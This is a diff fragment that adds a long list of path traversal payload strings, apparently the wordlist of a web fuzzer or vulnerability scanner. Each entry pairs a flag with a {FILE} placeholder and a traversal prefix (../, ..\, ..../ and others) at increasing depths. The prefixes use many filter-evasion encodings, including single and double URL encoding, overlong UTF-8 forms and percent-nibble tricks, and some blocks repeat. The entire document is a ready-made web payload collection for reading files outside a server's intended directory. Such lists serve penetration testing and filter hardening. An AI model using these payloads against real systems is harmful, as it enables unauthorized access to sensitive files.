+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,\\../{FILE}",
+ "true,\\../\\../{FILE}",
+ "true,\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
+ "true,/..\\{FILE}",
+ "true,/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
+ "true,.../{FILE}",
+ "true,.../.../{FILE}",
+ "true,.../.../.../{FILE}",
+ "true,.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../{FILE}",
+ "true,.../.../.../.../.../.../.../.../{FILE}",
+ "true,...\\{FILE}",
+ "true,...\\...\\{FILE}",
+ "true,...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
+ "true,..../{FILE}",
+ "true,..../..../{FILE}",
+ "true,..../..../..../{FILE}",
+ "true,..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../{FILE}",
+ "true,..../..../..../..../..../..../..../..../{FILE}",
+ "true,....\\{FILE}",
+ "true,....\\....\\{FILE}",
+ "true,....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
+ "true,........................................................................../{FILE}",
+ "true,........................................................................../../{FILE}",
+ "true,........................................................................../../../{FILE}",
+ "true,........................................................................../../../../{FILE}",
+ "true,........................................................................../../../../../{FILE}",
+ "true,........................................................................../../../../../../{FILE}",
